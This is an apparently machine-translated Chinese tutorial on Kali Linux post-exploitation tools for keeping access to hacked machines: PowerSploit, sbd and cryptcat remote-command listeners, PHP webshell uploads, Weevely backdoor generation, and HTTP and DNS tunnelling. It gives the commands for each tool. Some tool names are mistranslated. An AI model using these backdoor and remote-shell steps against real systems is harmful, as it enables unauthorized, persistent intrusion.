📜  Kali Linux-维护访问权限

📅  最后修改于: 2020-12-06 10:01:51             🧑  作者: Mango


在本章中,我们将看到Kali用来维持连接和访问被黑机器的工具,即使它们再次连接和断开连接也是如此。

Powersploit

这是用于Windows计算机的工具。它在受害者计算机上安装了PowerShell。该工具可帮助黑客通过PowerShell与受害者的计算机连接。

要打开它,请打开左侧的终端,然后键入以下命令以进入powersploit文件夹-

cd /usr/share/powersploit/ 

如果键入“ ls” ,它将列出所有可访问的powersploit工具,您可以在受害人的计算机上下载并安装这些工具。他们中的大多数人根据他们的名字来解释自己的名字。

Powersploit

在受害者的机器上下载此工具的一种简单方法是创建一个Web服务器,powersploit工具允许使用以下命令轻松创建该服务器-

python -m SimpleHTTPServer 

下载工具

此后,如果键入:http:// :8000 /,则结果为。

目录清单

sbd

sbd是类似于Netcat的工具。它是便携式的,可以在Linux和Microsoft计算机中使用。 sbd具有AES-CBC-128 + HMAC-SHA1加密功能>基本上,它可以帮助您随时在特定端口上连接到受害者的计算机,并远程发送命令。

要打开它,请转到终端并键入“ sbd -l -p port”,以使服务器接受连接。

连接接受

在这种情况下,让我们将端口44放置在服务器将监听的位置。

箱口

在受害者的站点上,键入“ sbd IPofserver端口” 。将建立一个连接,我们可以在其中发送远程命令。

在这种情况下,它是“ localhost”,因为我们在同一台计算机上执行了测试。

IP服务器

最后,在服务器上,您将看到已建立连接,如以下屏幕截图所示。

服务器连接

Webshells

Webshell可以用于维护访问或入侵网站。但是其中大多数是由防病毒软件检测到的。 C99 php shell在防病毒软件中是众所周知的。任何常见的防病毒软件都可以轻松将其检测为恶意软件。

通常,它们的主要函数是通过Web界面发送系统命令。

要打开它,然后在终端中键入“ cd / usr / share / webshells /”

网页外壳

如您所见,它们根据编程语言分为不同的类:asp,aspx,cfm,jsp,perl,php

如果输入PHP文件夹,则可以看到php网页的所有webshell。

夹

要将外壳程序上载到Web服务器,例如“ simple-backdoor.php”,请打开Web外壳程序的网页和URL。

最后,编写cmd命令。您将获得所有信息,如以下屏幕截图所示。

写命令

韦韦利

Weevely是一个PHP Web Shell,用于模拟类似于telnet的连接。它是用于Web应用程序事后开发的工具,可以用作隐身后门或Web Shell,用于管理合法Web帐户,甚至免费托管的帐户。

要打开它,请转到终端,然后键入“ weevely”,您可以在其中查看其用法。

韦韦利

要生成外壳,请键入“ weevely generate password pathoffile” 。如下面的屏幕快照所示,它是在“桌面”文件夹中生成的,文件将上传到网络服务器中以获取访问权限。

产生外壳

如下面的屏幕快照所示,在上载了Web Shell之后,我们可以使用“ weevely URL password”命令将cmd连接到服务器,您可以在其中看到会话已开始。

上载档案

http隧道

http-tunnel创建在HTTP请求中建立隧道的双向虚拟数据流。如果需要,可以通过HTTP代理发送请求。这对使用限制性防火墙的用户很有用。如果通过HTTP代理允许WWW访问,则可以使用http-tunnel和telnet或PPP连接到防火墙外部的计算机。

首先,我们应该使用以下命令创建隧道服务器-

httptunnel_server –h 

然后,在客户端站点上键入“ httptunnel_client –h” ,这两个站点都将开始接受连接。

dns2tcp

这再次是一种隧道工具,可帮助通过DNS通信(即UDP 53端口)传递TCP通信。

要启动它,请输入“ dns2tcpd” 。将在您打开脚本时说明用法。

域名解析

在服务器站点上,输入此命令以配置文件。

#cat >>.dns2tcpdrc

在“客户端”站点上,输入此命令。

# cat >>.dns2tcprc 
<

隧道将从此命令开始。

隐猫

这是另一个类似于Netcat的工具,它允许以加密的方式与受害者的计算机建立TCP和UDP连接。

要启动服务器以侦听连接,请键入以下命令-

cryptcat –l –p port –n 

隐猫

哪里,

  • -l代表监听连接

  • -p代表端口号参数

  • -n代表不进行名称解析

在客户端站点上,连接命令为“ cryptcat IPofServer PortofServer”

服务器端口